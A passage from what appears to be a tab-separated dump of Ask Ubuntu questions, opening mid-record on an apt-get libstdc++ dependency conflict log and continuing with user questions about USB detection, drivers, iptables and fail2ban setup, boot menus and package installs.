selecting 'libstdc++6-4.7-pic-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++6-doc ' for regex 'stdc+' note , selecting 'libstdc++6-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.4-dbg ' for regex 'stdc+' note , selecting 'libstdc++-4.8-dev-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++5 ' for regex 'stdc+' note , selecting 'libstdc++6 ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.4-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'lib32stdc++6-4.3-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.0-dbg-arm64-cross ' for regex 'stdc+' note , selecting 'libstdc++2.9-glibc2.1-dev ' for regex 'stdc+' note , selecting 'libsfstdc++-4.8-dev-armhf-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.7-dev-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.1-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-4.5-dbg ' for regex 'stdc+' note , selecting 'libstdc++6-4.7-dev-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.4-dev ' for regex 'stdc+' note , selecting 'libsfstdc++6-4.7-dbg-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.2-dbg-armel-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.2-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.3-doc ' for regex 'stdc+' note , selecting 'libsfstdc++6-armhf-cross ' for regex 'stdc+' note , selecting 'libstdc++6-4.6-pic ' for regex 'stdc+' note , selecting 'libstdc++6-dev-armhf-dcv1 ' for regex 'stdc+' note , selecting 'libstdc++6-dbg-powerpc-cross ' for regex 'stdc+' note , selecting 'lib64stdc++6-powerpc-cross ' instead of 'lib64stdc++6-powerpc-dcv1' note , selecting 'libhfstdc++6-4.7-dbg-armel-cross ' instead of 'libhfstdc++6-dbg-armel-dcv1' note , selecting 'libhfstdc++6-armel-cross ' instead of 'libhfstdc++6-armel-dcv1' note , selecting 'libsfstdc++6-armhf-cross ' instead of 'libsfstdc++6-armhf-dcv1' note , selecting 'libstdc++-4.8-pic-arm64-cross ' instead of 'libstdc++-pic-arm64-dcv1' note , selecting 'libstdc++-4.8-pic-armhf-cross ' instead of 'libstdc++-pic-armhf-dcv1' note , selecting 'libstdc++-4.8-pic-powerpc-cross ' instead of 'libstdc++-pic-powerpc-dcv1' note , selecting 'libstdc++6-4.7-dbg-armel-cross ' instead of 'libstdc++6-dbg-armel-dcv1' note , selecting 'libstdc++6-4.7-dev-arm64-cross ' instead of 'libstdc++6-dev-arm64-dcv1' note , selecting 'libstdc++6-4.7-dev-armel-cross ' instead of 'libstdc++-dev-armel-cross' note , selecting 'libstdc++6-4.7-dev-armel-cross ' instead of 'libstdc++-dev-armel-dcv1' note , selecting 'libstdc++6-4.7-dev-armel-cross ' instead of 'libstdc++6-dev-armel-dcv1' note , selecting 'libstdc++6-4.7-dev-armhf-cross ' instead of 'libstdc++6-dev-armhf-dcv1' note , selecting 'libstdc++6-4.7-dev-powerpc-cross ' instead of 'libstdc++6-dev-powerpc-dcv1' note , selecting 'libstdc++6-4.7-pic-arm64-cross ' instead of 'libstdc++6-pic-arm64-dcv1' note , selecting 'libstdc++6-4.7-pic-armel-cross ' instead of 'libstdc++6-pic-armel-dcv1' note , selecting 'libstdc++6-4.7-pic-armhf-cross ' instead of 'libstdc++6-pic-armhf-dcv1' note , selecting 'libstdc++6-4.7-pic-powerpc-cross ' instead of 'libstdc++6-pic-powerpc-dcv1' note , selecting 'libstdc++6-arm64-cross ' instead of 'libstdc++6-arm64-dcv1' note , selecting 'libstdc++6-armel-cross ' instead of 'libstdc++6-armel-dcv1' note , selecting 'libstdc++6-armhf-cross ' instead of 'libstdc++6-armhf-dcv1' note , selecting 'libstdc++6-powerpc-cross ' instead of 'libstdc++6-powerpc-dcv1' lib32stdc++-4.8-dev is already the newest version . lib32stdc++-4.8-dev set to manually installed . lib32stdc++6 is already the newest version . lib32stdc++6 set to manually installed . libstdc++-4.8-dev is already the newest version . libstdc++-4.8-dev set to manually installed . libstdc++6 is already the newest version . libx32stdc++-4.8-dev is already the newest version . libx32stdc++-4.8-dev set to manually installed . libx32stdc++6 is already the newest version . libx32stdc++6 set to manually installed . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : lib32stdc++6-4.6-dbg : conflicts : lib32stdc++6-4.4-dbg but 4.4.7-2ubuntu2 is to be installed lib32stdc++6-4.7-dbg : conflicts : lib32stdc++6-4.4-dbg but 4.4.7-2ubuntu2 is to be installed conflicts : lib32stdc++6-4.6-dbg but 4.6.4-3ubuntu1 is to be installed lib32stdc++6-4.8-dbg : conflicts : lib32stdc++6-4.4-dbg but 4.4.7-2ubuntu2 is to be installed conflicts : lib32stdc++6-4.6-dbg but 4.6.4-3ubuntu1 is to be installed conflicts : lib32stdc++6-4.7-dbg but 4.7.3-7ubuntu3 is to be installed lib64stdc++6-4.8-dbg-powerpc-cross : conflicts : lib64stdc++6-4.7-dbg-powerpc-cross but 4.7.3-1ubuntu1cross0.7 is to be installed libstdc++-4.8-doc : conflicts : libstdc++6-4.4-doc but 4.4.7-2ubuntu2 is to be installed conflicts : libstdc++6-4.6-doc but 4.6.4-3ubuntu1 is to be installed conflicts : libstdc++6-4.7-doc but 4.7.3-7ubuntu3 is to be installed libstdc++6-4.6-dbg : conflicts : libstdc++6-4.4-dbg but 4.4.7-2ubuntu2 is to be installed libstdc++6-4.6-doc : conflicts : libstdc++6-4.4-doc but 4.4.7-2ubuntu2 is to be installed libstdc++6-4.7-dbg : conflicts : libstdc++6-4.4-dbg but 4.4.7-2ubuntu2 is to be installed conflicts : libstdc++6-4.6-dbg but 4.6.4-3ubuntu1 is to be installed libstdc++6-4.7-doc : conflicts : libstdc++6-4.4-doc but 4.4.7-2ubuntu2 is to be installed conflicts : libstdc++6-4.6-doc but 4.6.4-3ubuntu1 is to be installed libstdc++6-4.8-dbg : conflicts : libstdc++6-4.4-dbg but 4.4.7-2ubuntu2 is to be installed conflicts : libstdc++6-4.6-dbg but 4.6.4-3ubuntu1 is to be installed conflicts : libstdc++6-4.7-dbg but 4.7.3-7ubuntu3 is to be installed libstdc++6-4.8-dbg-arm64-cross : conflicts : libstdc++6-4.7-dbg-arm64-cross but 4.7.3-1ubuntu1cross0.6 is to be installed libstdc++6-4.8-dbg-armhf-cross : conflicts : libstdc++6-4.7-dbg-armhf-cross but 4.7.3-7ubuntu3cross1.84 is to be installed libstdc++6-4.8-dbg-powerpc-cross : conflicts : libstdc++6-4.7-dbg-powerpc-cross but 4.7.3-1ubuntu1cross0.7 is to be installed libx32stdc++6-4.8-dbg : conflicts : libx32stdc++6-4.7-dbg but 4.7.3-7ubuntu3 is to be installed e : unable to correct problems , you have held broken packages . leo @ leo-svs1513m1rb : ~/atomic $ sudo apt-get -u dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
422570	usb drive not detected or responding 13.04 | power problem suspected	hej , a toshiba usb 2.0 hard drive is not detected by lsusb or found via ls /dev/sd* . according to paul the problem is related to the usb power , but after restarting the laptop without connected usb devices the output of syslog is the same ( see below ) . furthermore i am using a dual head usb cable to ensure power supply . how can i get ubuntu to enumerate/recognize my usb drive on my dell lx502x ? ciao feb 18 12:32:32 laptop kernel : [ 166.175281 ] usb 3-2 : new full-speed usb device number 6 using xhci_hcd feb 18 12:32:32 laptop kernel : [ 166.175712 ] usb 3-2 : device not responding to set address . feb 18 12:32:33 laptop kernel : [ 166.379229 ] usb 3-2 : device not responding to set address . feb 18 12:32:33 laptop kernel : [ 166.582606 ] usb 3-2 : device not accepting address 6 , error -71 feb 18 12:32:33 laptop kernel : [ 166.694423 ] usb 3-2 : new full-speed usb device number 7 using xhci_hcd feb 18 12:32:33 laptop kernel : [ 166.694835 ] usb 3-2 : device not responding to set address . feb 18 12:32:33 laptop kernel : [ 166.898418 ] usb 3-2 : device not responding to set address . feb 18 12:32:33 laptop kernel : [ 167.101839 ] usb 3-2 : device not accepting address 7 , error -71 feb 18 12:32:33 laptop kernel : [ 167.213620 ] usb 3-2 : new full-speed usb device number 8 using xhci_hcd feb 18 12:32:33 laptop kernel : [ 167.214055 ] usb 3-2 : device not responding to set address . feb 18 12:32:34 laptop kernel : [ 167.417702 ] usb 3-2 : device not responding to set address . feb 18 12:32:34 laptop kernel : [ 167.621033 ] usb 3-2 : device not accepting address 8 , error -71 feb 18 12:32:34 laptop kernel : [ 167.732798 ] usb 3-2 : new full-speed usb device number 9 using xhci_hcd feb 18 12:32:34 laptop kernel : [ 167.733227 ] usb 3-2 : device not responding to set address . feb 18 12:32:34 laptop kernel : [ 167.936909 ] usb 3-2 : device not responding to set address . feb 18 12:32:34 laptop kernel : [ 168.140214 ] usb 3-2 : device not accepting address 9 , error -71 feb 18 12:32:34 laptop kernel : [ 168.140268 ] hub 3-0:1.0 : unable to enumerate usb device on port 2
422571	keeping `` info '' lines visible after quitting `` info '' ?	i have : export manpager= '' /usr/bin/less -r -x -is '' as the last line in ~/.bashrc . this allows me to keep most of a man page visible on screen after exiting man . i want to do the same when i view info pages . how to do so ? now , it looks like the info page is `` drawn '' over existing content on the terminal screen . and leaving info brings back the previous screen completely . what i want is to have the part of info i was viewing to remain on the screen with a terminal prompt as last line ( for typing commands )
422575	disable bridge module from loading at boot	i am working with another module which ca n't work with this . so , every time i start my system , i have to do rmmod bridge i want to avoid that . if i open /etc/modules , i just find loop lp rtc but not the bridge one . strange enough , putting it into /etc/modprobe.d/blacklist.conf seems having no effect . what i am doing wrong ?
422578	chrome not loading all assets of locally hosted html page	okay so i have a lamp stack on my local machine ( not a vm so blow up not ideal ) . i have been doing some locally dev work on it lately and this morning when i loaded up my machine and pointed chrome to my local webpage it is not loading a specific asset on one page ... however when i enter incognito window it loads , also loads in firefox loads no problem , .. i thought it might be one of my chrome extensions so i disabled al of them but still no luck . i have no idea how to really debug this or whats going on so any help would be greatly appreciated . ( the asset in question is a css file ) .
422579	ubuntu refuses to enter recovery mode	i just installed nvidia 's latest version of their drivers for ubuntu ( 13.10 ) , which do n't seem to work for me - i 'm getting the 'system is running in low-graphics mode ' dialogue box . i 've tried booting to the console to apt-get the most recent stable version of the drivers , but i am unable to get any access to the console . the low graphics error dialog gives me 4 options , one of which is to run the console . if i select it , it fails to bring up the console ; all i get is a blinking cursor . i then tried to boot into the gnu grub menu / recovery mode , but holding the left shift button fails to bring up anything . in fact , the boot just continues forward to the low graphics error as if i has n't pushed anything at all . mashing esc did n't work either , but it did insert the ^ [ symbol , so it looks like the computer is detecting my keyboard , but is refusing to respond to it . how can i fix this if i ca n't get to the console ?
422582	able to put pass phrase in to connect to my network but button is greyed out	i 've installed ubuntu 13.10 on a laptop that has an ethernet connection ( or used to have one ) . i can `` see '' my network but when i put in the pass phrase the `` connect '' button is not active - it 's grey and wo n't allow me to select connect . what 's happening or not happening ?
422583	banshee does n't accept flac	banshee -- > `` import media '' '' files '' -- - > selecting a song in .flac format does not show up in banshee library . fails for multple different .flac files . the .flac files play perfectly fine in other media players like vlc . everything works fine if in mp3 format . i 'm using ubuntu 13.04 - raring inspecting ~/.config/banshee-1/banshee.db , it seems that the .flac files are in fact added to banshee.db , but they are not copied to the `` music folder '' as designated in banshee 's preferences . also , although they appear in banshee.db , they do not show up in the banshee gui .
422586	grab volume name of volumes over 85 %	i want from the output below grab all the volume names that have a capacity over 85 % . i know that there is n't one in ths example but lets pretend there is . : ) filesystem total used avail capacity mounted on /vol/mc3240a/ 190gb 18gb 171gb 10 % /vol/mc3240a/ /vol/mc3240a/.snapshot 10gb 355mb 9884mb 3 % /vol/mc3240a/.snapshot /vol/mc3240b_root_backup/ 210gb 9019mb 201gb 4 % /vol/mc3240b_root_backup/ /vol/mc3240b_root_backup/.snapshot 0mb 1691mb 0mb -- - % /vol/mc3240b_root_backup/.snapshot
422588	phablet-tools : 依赖 : click 但无法安装它	follow the torturial ( http : //www.ubuntu.org.cn/phone/install ) error happened in step 1 root @ y : /etc/apt # sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot 正在读取软件包列表 ... 完成 正在分析软件包的依赖关系树 正在读取状态信息 ... 完成 有一些软件包无法被安装。如果您用的是 unstable 发行版，这也许是 因为系统无法达到您要求的状态造成的。该版本中可能会有一些您需要的软件 包尚未被创建或是它们已被从新到 ( incoming ) 目录移出。 下列信息可能会对解决问题有所帮助： 下列软件包有未满足的依赖关系： phablet-tools : 依赖 : click 但无法安装它 e : 无法修正错误，因为您要求某些软件包保持现状，就是它们破坏了软件包间的依赖关系。 root @ y : /etc/apt # from oli as a rough translation : reading package lists ... done building dependency tree package reading state information ... done some packages could not be installed . if you are using the unstable distribution , this may be because the system is unable to meet the requirements of the state of your cause . there may be some software you need this release package has not yet been created or they have been new to ( incoming ) directory out . the following information may be helpful to solve the problem : the following packages have unmet dependencies : phablet-tools : dependency : click but unable to install it e : can not fix the error , because you ask some packages to keep the status quo , that they destroyed the dependencies between packages
422590	user display settings failed after projector connection	after user has disconnected vga-projector from my notebook with xubuntu 13.10 , the screen resolution has failed to 640x480 ( reboot does n't help ) . i suppose that some user configs have failed after projector connection , so ho can i restore it ? all works correct on other accounts .
422592	export an image with darktable	i 'm very new to darktable . i ca n't export ( or save ) my new modified image . it 's version is 1.2.3 ( is it outdated ? ) searched for a while ; they said here that there should be an `` export selected '' button to the right but i ca n't find it anywhere . ctrl+e exports the image directly but i want to chose my format and quality and so ... where is that button ? ! ? ! ? !
422593	iptables configursation question	purely as an academic exercise in an attempt to simply learn , i have been playing with iptables . spent a few days on this so far and i think i now have a good understanding of how it all works . i started with only changing settings on the input chain and i can now accept/deny pretty much anything i need . ssh access for example . i then moved on to 'playing ' with the output chain and , whilst i think i understand what i 'm doing , i must be missing something somewhere . here is what i am trying to do ( simply as a learning excercise ) . block all incoming requests , block all outgoing requests , then manually enable them one by one . thought i would test it with http web access and i ca n't get it working . i am using webmin to configure iptables but i am happy to use a shell as well . input chain : default to block . enable tcp to destination port 80 for new and established connections . enable tcp to destination port 53 for new and established connections . output chain : default to block . enable tcp from source port 80 for new connections . enable tcp from source port 53 for new connections . i am thinking this way , i can browse the interweb ( not https i know ) as long as i initiate the connection . as i say i 'm just trying to understand a little more about iptables and network traffic in general . any pointers as to what i am doing wrong would be welcome . p.s . i 'm a windows convert ... . be gentle !
422595	can not see an option to remove vpn one click	i installed vpnoneclick onto my machine , i want to remove it as it does n't seen to sit well with my laptop . when i go into the software depository i do n't see it listed . is there a way to hard remove the program , such as a software tool to force uninstall . or can i either deleted using terminal or even just hide it from the desktop .
422596	huawei e173s-2 modem	i want to know which version of ubuntu would support my huawei huawei e173s-2 modem . recently i installed mint 13 on my laptop and i could n't get my 3g modem to work , i tried many tutorials and how-to 's but i could n't get it to work.. than i reinstalled windows 7 again . i really want to discover linux but i also want to use my 3g modem on it because it 's my only way to get connected to internet . so could anyone advice me which version of ubuntu would run my huawei e173s-2 modem . much thanks . ( i 'm sorry for the english )
422598	creating partitions in root ?	i was trying to install ubuntu along with windows but accidentally i got my entire hard disk wiped out and ubuntu remained . now , ubuntu is installed as considering my entire 500 gb as one drive ( that too root ) with some space allocated to swap and all ... now , is there any option so that i could make some drives out of the situation ... any help will be great.. thanks piyush
422602	ubuntu installation on intel android tablet	i am having an android x86 tablet pc , i want to install ubuntu linux or or linux os that will give me a desktop like environment . could you please help me to intsall the same . details of the hardware - model : ramos i9 tablet pc - processor : intel z2580 clovertrail+ 2.0 ghz - quad core - memory : 2gb ddr3 - storage : 16 gb nand flash - current os : android x86 4.2.2 please help ! thanks chirantan
422605	why is /usr/local/games after /usr/games in the default path ?	the default value of the path environment variable in ubuntu ( 13.10 , at least ) for an administrator ( user in the sudo group ) after logging in to the desktop environment is : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games /usr/local/sbin and /usr/local/bin appear before /usr/sbin and /usr/bin . however , /usr/local/games appears after /usr/games . is there a reason for this ? or it 's just a typo ? more information normal/administrator user 's default path after logging with su - user : /usr/local/bin : /usr/bin : /bin : /usr/local/games : /usr/games normal/administrator user 's default path after logging in a virtual console : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games default path for the root user ( after logging in with sudo -i ; i have n't tried enabling the root user and logging in through a virtual console ) : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin content of /etc/environment : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games '' relevant line of /etc/sudoers : defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' relevant lines of /etc/login.defs : env_supath path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin env_path path=/usr/local/bin : /usr/bin : /bin : /usr/local/games : /usr/games repeating the main question : what 's the reason for /usr/local/games to appear after /usr/games , instead of before , in the default path ? and a related question : from where does the value of path come from ? it seems /etc/environment and /etc/login.defs are both used in different situations .
422607	unity-dash problem	i have an asus x64j laptop with 2 graphic cards ( intel + nvidia ) . i installed bumblebee to play games but since then my launcher looks different . i want that part in the circle straight like on the top and in the middle , not compressed . can someone give me any idea of how to fix it ? thx !
422612	installing mysql 5.6 using ppa	i 'm trying to install mysql 5.6 on my ubuntu 12.04 over the already installed 5.5 the easy way ( using ppas ) . i 've found ondĺej sură˝ 's ppa here . it sounds promising but i could n't upgrade my mysql . here are the steps i 've taken : sudo add-apt-repository 'deb http : //ppa.launchpad.net/ondrej/mysql-5.6/ubuntu precise main' openning update manager i pressed check button to retrieve the database for newly added repository . a bunch of packages were listed including mysql client 5.6 and others but they were all small packages ( matter of kb ) . i downloaded and installed all of the listed packages ( except one which i 'll tell you about it later ) . restarted mysqld daemon . having done all above , i see no change in my mysql server version , it 's still 5.5.35 ! the one package that did n't install was perhaps the most important one , it 's called : mysql database sever ( metapackage depending on the latest version ) mysql-server ( size : 88 kb ) and the reason why i did n't install it is because i ca n't ! even though it 's there in my update manager 's list with a check-box but the check-box is disabled and i 'm unable to check it . it 's just stuck there and wo n't go away or anything . did i miss a step or something ? how can i install mysql 5.6 ?
422616	how to abort shutdown command in ubuntu ?	if i give this command for shutting down the system : $ sudo shutdown -h 10:20 `` going down '' how can i abort it ?
422618	usb wireless adapter very slow to start	for some weeks now , my usb adapter has been extremely slow to connect ( taking up to 10 minutes at times ) . i have noticed that , when i start the computer , the information `` unable to enumerate usb device on port xxx '' appears fleetingly . `` lsusb '' produces : `` bus 002 device 119 : id 0586:3410 zyxel communications corp. zyair g-202 802.11b '' , with the device number changing every time ( or so it seems ) . as soon as the connection is established , everything works alright . could this be due to the adapter stick nearing the end of its life cycle ? if so , any recommendations for replacing the stick ? the zyair g-202 does n't seem to be available anymore . ( my router is a fritzbox , but the wlan stick provided by avm does n't work with linux . ) or could the trouble be located elsewhere ? g.heinlein
422619	simple : check if volume group is found with a if	i am working on a script to check if volume group vg0 exist . the problem is that it return found even when i delete the volume group . so very unsure what is wrong . # ! /bin/bash if vgdisplay | grep 'vg0 ' | awk ' { print $ 3 } ' ; then echo `` found '' else echo `` not found '' fi
422621	after installation of ubuntu alongside windows 7 boot menu shows ubuntu , memory tester , windows 7 how can i edit it ?	after installation of ubuntu alongside windows 7 boot menu is showing ubuntu , memory tester , windows 7 how can i edit it ? i would like to see while rebooting the screen menu that would show windows 7 or ubuntu to boot and i need to know how can i increase the font of boot menu ?
422622	how to open ntfs partition on ubuntu without windows ' hidden files ?	my computer is dual boot with ubuntu 13.10 and windows 8 , but when i open ntfs partition in ubuntu , crap files like : system volume information $ recycle.bin appear . how can i get rid of these files ?
422624	can not connect to work vpn	i 'm using ubuntu studio 13.04 saucy , and generally new to ubuntu . i work for a company which provides windows based pptp vpn access for working remotely . soon after i installed ubuntu studio , i was able to connect to the vpn and it worked fine . a couple weeks later , i went to connect to the vpn , and it no longer worked . i had n't changed any settings . i 'm guessing something in one of the updates must have changed the vpn or firewall settings , but since i do n't know what changed , i do n't know where to start to try to get it working again . i 've followed a bunch of instructions in response to existing questions , and still have n't been able to get it to work . the tech guy at work says i need to enable gre 47 protocol . looking between the vpn config settings and the firewall config settings , i do n't see anything specifically addressing gre 47 . one of many things i 've tried is disabling the firewall , altogether , and still i ca n't connect . i 'm this close to setting up my system to dual-boot some other os to resolve this , but i 'd rather make it work in ubuntu . any suggestions ? thanks , -ron
422626	fail2ban/iptables & pure-ftpd	i have pure-ftpd running on web server with fail2ban . fail2ban is letting apache2 connections in but are denying any ftp connection from anything but local host . i have attempted to modify the jail.local and jail.conf files but i am still having issues . here is the pure-ftpd section of my jail.local file : [ pure-ftpd ] enabled = true port = ftp , ftp-data , ftps , ftps-data filter = pure-ftpd logpath = /var/log/auth.log maxretry = 6 here is a view of my iptables -l -n : chain input ( policy drop ) target prot opt source destination fail2ban-postfix tcp -- 0.0.0.0/0 0.0.0.0/0 multiport dports 80,443,25,587,110,995,143,993,4190 fail2ban-dovecot tcp -- 0.0.0.0/0 0.0.0.0/0 multiport dports 80,443,25,587,110,995,143,993,4190 fail2ban-roundcube tcp -- 0.0.0.0/0 0.0.0.0/0 multiport dports 80,443,25,587,110,995,143,993,4190 fail2ban-ssh tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:22 fail2ban-pure-ftpd tcp -- 0.0.0.0/0 0.0.0.0/0 multiport dports 21,20,990,989 accept all -- 0.0.0.0/0 0.0.0.0/0 state related , established accept all -- 0.0.0.0/0 0.0.0.0/0 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:443 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:25 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:587 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:110 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:995 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:143 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:993 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:22 accept icmp -- 0.0.0.0/0 0.0.0.0/0 icmptype 8 chain forward ( policy drop ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain fail2ban-dovecot ( 1 references ) if i run the following commands manually ftp works ( as active , still ca n't get passive to work ) , but i really want to get this working with fail2ban : iptables -a input -p tcp -- dport 21 -j accept iptables -a output -p tcp -- sport 20 -j accept any ideas on how to get the fail2ban to configure iptables correctly ? if not , what rules do i need to set to get active and passive ftp working correctly ?
422627	cubiebord 2 and ubuntu ?	hi i need some help with the cubiebord 2 and ubuntu . i want to buy one an i would like to know some things : - can i make it a ubuntu server ? - i want to use it to instal any operating linux , windows , macos , more precisely is there any program on ubuntu that can let me instal operating systems over pxe protocol ? - i need a program that can do this thing ? - and i have some more questions but for now i would be very tankful if someone understand what i want ?
422628	how to know packet statistics of a nic ?	i am using ubuntu 12.04 lts.let me explain what i am trying to do . if i have a device named eth0 , i would like see its statistics as how many data packets were transmitted by the device and in those packets how many packets were transmitted with in a range . for example say range as 512bytes to 1024 bytes packet count . similarly for receiving also packet count with all available ranges . thank you .
422629	desktop hard drive wo n't spin down according to settings	i have a desktop machine with two ssds , one each with windows 8.1 and ubuntu 13.10 , and one hdd which contains a single ntfs partition on which i throw big files . it actually only rarely gets used and so i 'd rather it remain off most of the time , as it is the loudest component in my desktop , and i 'm not even the slightest bit concerned about long-term wear ( i 'll replace it before it gets to that point . ) so , i 've used the gnome-disks utility to set it to standby after 5 minutes : however , my drive appears to ignore this and remains on in perpetuity . automatic spin-down works in windows 8 , and i 'm able to use gnome-disks to manually spin down the drive as well , so i do n't suspect incompatibility , but is there something else i 'm missing ?
422631	looking for unused debs in my ubuntu	for example , i can extract information about every files of installed packages . thereafter , i can do find -ls with -mmin & -mtime somehow , i can draw a graph of absolutelly unused packages . is there ready solution ? edit : i found popularity-contest here : is there a usage count for packages or programs ? i 'm interesting in graphic interpretation , something like gnome 's baobab or kde 's filelight .
422633	lubuntu in a macbook pro	once i installed ubuntu on a macbook pro and had a terrible experience : - i could n't close the laptop , i mean put down the screen ( sorry , bad english ) . if i closed , i had to kill the session to be able take control of the machine . something to do with swap not working as it should be . - it heated very much . energy efficiency was really bad compared to osx i want to know if anybody here who had already installed lubuntu on any macbookpro ( mine is mid 2012 ) know if these issues exist also with a dual-boot lubuntu ps : it would be in my case a triple-boot because since my experience with ubuntu was bad i installed a win but i guess there is no big deal with this . i would remove win to use lubuntu . ps 2 : please do n't reply to this post with a tutorial of how to put a linux distro in a mac machine
422636	dell latitude 2100 does not recognize wifi	please , i installed ubuntu on a dell latitude 2100 netbook and it does not recognize the wifi , procedures need to resolve this difficulty .
422639	help with ram usage	i have a dual boot laptop with 512 mb ram running windows xp/xubuntu . i try to load student.portal.chalmers.se ( a huge bloat site ) in firefox . on xp , i can load the site without any swapping , but all my ram is eaten as shown in processexplorer . on xubuntu ( with linux 3.11 ) i get a huge swapping when the site loads . both windows and linux has swap space . is the reason linux disk cache eating the last ram needed or is xubuntu more resource hungry than xp . if the former , is it possible to configure the kernel to not cache too mutch in ram ? if the latter , can anyone suggest a more lightweight desktop environment than xfce . edit : after visiting the same site on my 64-bit desktop with 8 gb ram , firefox did not eat more than 150 mb . so i guess firefox put all images on the graphics card and the laptop has not great graphics performance . edit 2 : try open https : //student.portal.chalmers.se/_layouts/chalmers.core.ui/images/box-light-map2.png which is a background image that automatically loads . you have been warned if you are low on memory ! edit 3 : the implementation of the web-page layout has now changed , and now it is possible to visit the page .
422644	change home mount point , where does original folder go ?	on a completely fresh install of ubuntu , i created only one root partition `` / '' on `` drivefoo '' which holds all my system files , including my `` /home '' folder . now , i wish to instead have my `` /home '' mount point on another drive . no problem , in terminal i have run sudo cp -rp /home/user /media/drivebar now i 'll edit my fstab , and mount /home to `` drivebar '' ... reboot , and no problem here ! what i am asking now is simply : after changing the mount point of `` /home '' what happens to the files that were in `` /home '' when its mount point was on drivefoo 's `` / '' ? thanks , brian edit : in addition to accepted answer from bodhi.zazen , see link posted in comment to my question from user68186 .
422645	what is wrong with my startup command in rc.local ?	i just want to start my custom webserver every time my server reboots automatically . how can i do that ? xsp4 -- applications=/ : /home/me/website -- name=website -- quiet this command works just fine when i execute it , i just want it to be executed at startup every time server restarts . i have pretty much zero experience in this so i would like to know what i am doing wrong . here is my rc.local # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . xsp4 -- applications=/ : /home/me/website -- name=website -- quiet exit 0
422646	convert odt to pdf via command line , without exporting as pdf form	i need to export odt writer file that contains forms to pdf via command line , but without exporting the odt as pdf form ( the same thing as you do in libreoffice when you choose export as pdf and do n't select forms ) . i know i can do conversion via unoconv or libreoffice command line , but both export odt to pdf with forms , as far as i have tried . so is it possible to convert odt to pdf without exporting the form via command line ? if not via command line , can this be done programatically , like in java or some other language for example ?
422647	how to decide which drivers for ralink 148f:7601 ?	i have just got my new usb wifi dongle and i am trying to get it running on 13.10. lsusb gives me the following : $ lsusb -v bus 002 device 005 : id 148f:7601 ralink technology , corp. bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x148f ralink technology , corp. idproduct 0x7601 ... first thing i have tried was to install the drivers from the cd that was attached to it . there i have found this file 2011_0719_rt3070_rt8070_rt3370_rt5370_rt5372_rt2070_linux_sta_v2.5.0.3_dpo.bz2 and in the readme there was a note for modelname : =========== rt2870 wireless lan linux driver ======================================================================= driver lname : =========== rt2870.o/rt2870.ko after launching sudo make ( sudo because i had an issue with copying to cp can not create regular file /tftpboot ' permission denied ) , sudo make install now i can $ sudo modprobe rt5370sta i also have rt2800usb but it also does n't work . now when i enter the usb dongle i get in syslog feb 18 15:53:03 xxx kernel : [ 302.509247 ] usb 2-1.3 : new high-speed usb device number 5 using ehci-pci feb 18 15:53:04 xxx kernel : [ 302.969353 ] usb 2-1.3 : new usb device found , idvendor=148f , idproduct=7601 feb 18 15:53:04 xxx kernel : [ 302.969359 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 feb 18 15:53:04 xxx mtp-probe : checking bus 2 , device 5 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3 '' feb 18 15:53:04 xxx mtp-probe : bus : 2 , device : 5 was not an mtp device i have also tried this http : //gowthamgowtham.blogspot.com/2013/11/mediatekralink-wifi-adapter-in.html but when i enter ra0 configuration to /etc/network/interfaces then pc wo n't boot for more than 1-3 minutes and when it boots there 's only lo interface loaded . edit the best part is that most of the link at mediatek 's website ( they had a fusion apparently ) is non existent http : //www.mediatek.com/_en/07_downloads/01_windows.php ? sn=501 edit2 after somehow getting my hands on 3.0.0.4 drivers for mt7601u i get the following in syslog feb 18 16:55:26 xxx kernel : [ 1975.959906 ] rtusb init rt2870 -- - > feb 18 16:55:26 xxx kernel : [ 1975.959913 ] error : driver 'rt2870 ' is already register ed , aborting ... edit3 i somehow got this working but when i launch wpa_supplicant i get the following debug log http : //paste.ubuntu.com/6955249/
